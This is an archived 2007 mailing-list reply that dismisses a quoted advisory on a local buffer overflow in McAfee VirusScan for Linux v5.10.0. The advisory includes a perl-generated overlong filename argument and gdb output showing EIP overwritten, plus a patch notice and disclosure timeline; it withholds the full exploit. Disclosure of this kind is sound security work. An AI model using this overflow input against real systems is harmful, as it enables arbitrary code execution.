lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Wed, 15 Aug 2007 10:39:07 -0400
From: "Joey Mengele" <joey.mengele@...hmail.com>
To: <full-disclosure@...ts.grok.org.uk>, <bugtraq@...urityfocus.com>,
	<sebastian@...fgarten.com>
Subject: Re: McAfee Virus Scan for Linux and Unix v5.10.0
	Local Buffer Overflow

Where does security come into play here? This is a local crash in a 
non setuid binary. I would like to hear your remote exploitation 
scenario. Or perhaps your local privilege escalation scenario?

J

P.S. We all know this advisory is bullshit, you should have sold it 
to WabiSabiLabi LOLOLOL

On Wed, 15 Aug 2007 08:56:54 -0400 Sebastian Wolfgarten 
<sebastian@...fgarten.com> wrote:
>I - TITLE
>
>Security advisory: McAfee Virus Scan for Linux and Unix v5.10.0 
>Local
>Buffer Overflow
>
>II - SUMMARY
>
>Description: Local buffer overflow vulnerability in McAfee Virus 
>Scan
>for Linux and Unix allows arbitrary code execution
>
>Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com)
>
>Date: August 15th, 2007
>
>Severity: Low-Medium
>
>References: http://www.devtarget.org/mcafee-advisory-08-2007.txt
>
>III - OVERVIEW
>
>McAfee Virus Scan for Linux and Unix is a command-line version of 
>the
>popular McAfee anti-virus scanner running on the Linux operating 
>system
>as well as on other Unices (e.g. AIX, Solaris, HP-UX etc.). It was
>discovered that the product is prone to a classic buffer overflow
>vulnerability when attempting to scan files or directories with a
>particularly long name. This vulnerability results in the local
>execution of arbitrary code with the privileges of the user 
>running the
>scanner, privilege escalation is by default not possible. Remote
>exploitation appears to be infeasible due to file length 
>limitations in
>popular file systems.
>
>IV - DETAILS
>
>The overflow occurs when the product tries to scan a file or 
>directory
>with a name that is longer than a certain size (approx. 4124+ 
>bytes).
>For example on a Debian Linux 3.1 test system, it takes 4124+4 
>bytes to
>successfully overwrite the EIP register and thus execute arbitrary 
>code:
>
># /usr/local/uvscan/uvscan --version
>Virus Scan for Linux v5.10.0
>Copyright (c) 1992-2006 McAfee, Inc. All rights reserved.
>(408) 988-3832  EVALUATION COPY - May 26 2006
>
>Scan engine v5.1.00 for Linux.
>Virus data file v4777 created Jun 05 2006
>Scanning for 194376 viruses, trojans and variants.
>
># gdb /usr/local/uvscan/uvscan
>GNU gdb 6.3-debian
>Copyright 2004 Free Software Foundation, Inc.
>GDB is free software, covered by the GNU General Public License, 
>and you
>are welcome to change it and/or distribute copies of it under 
>certain
>conditions. Type "show copying" to see the conditions. There is
>absolutely no warranty for GDB. Type "show warranty" for details. 
>This
>GDB was configured as "i386-linux"...(no debugging symbols found)
>Using host libthread_db library "/lib/tls/libthread_db.so.1".
>
>(gdb) run `perl -e 'print "A"x4124 . "B"x4'`
>Starting program: /usr/local/uvscan/uvscan `perl -e 'print 
>"A"x4124 .
>"B"x4'`
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>(no debugging symbols found)
>[Thread debugging using libthread_db enabled]
>[New Thread 1080238208 (LWP 2461)]
>(no debugging symbols found)
>
>Program received signal SIGSEGV, Segmentation fault.
>[Switching to Thread 1080238208 (LWP 2461)]
>0x42424242 in ?? ()
>(gdb) info registers
>eax            0x1      1
>ecx            0x8068430        134644784
>edx            0x1      1
>ebx            0x41414141       1094795585
>esp            0xbfffdc40       0xbfffdc40
>ebp            0x41414141       0x41414141
>esi            0x41414141       1094795585
>edi            0x41414141       1094795585
>eip            0x42424242       0x42424242
>eflags         0x282    642
>cs             0x73     115
>ss             0x7b     123
>ds             0x7b     123
>es             0x7b     123
>fs             0x0      0
>gs             0x33     51
>
>V - EXPLOIT CODE
>
>An exploit for this vulnerability has been developed but will not
>released to the general public at this time.
>
>VI - WORKAROUND/FIX
>
>To address this problem, the vendor has released McAfee VirusScan
>Command Line Scanner for Linux and Unix version 5.20. Thus all 
>users of
>the product are asked to test and install this patch as soon as
>possible. McAfee has also published a dedicated security bulletin 
>that
>covers the problem (see
>https://knowledge.mcafee.com/SupportSite/dynamickc.do?externalId=61
>3576&sliceId=SAL_Public&command=show&forward=nonthreadedKC&kcId=613
>576).
>
>
>VII - DISCLOSURE TIMELINE
>
>18. December 2006 - Notified security@...fee.com
>19. December 2006 - Vendor responded that vulnerability is being
>investigated
>19. December to 15. August 2007 - Weekly vendor report on the 
>progress
>of the development of the patch
>01. August 2007 - Release of patch
>15. August 2007 - Public disclosure

--
Click to become a master chef, own a restaurant and make millions.
http://tagline.hushmail.com/fc/Ioyw6h4eAFZexjoyRjzeiNugNCYHByYgDcZbE142fg5zU8vki64fmI/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ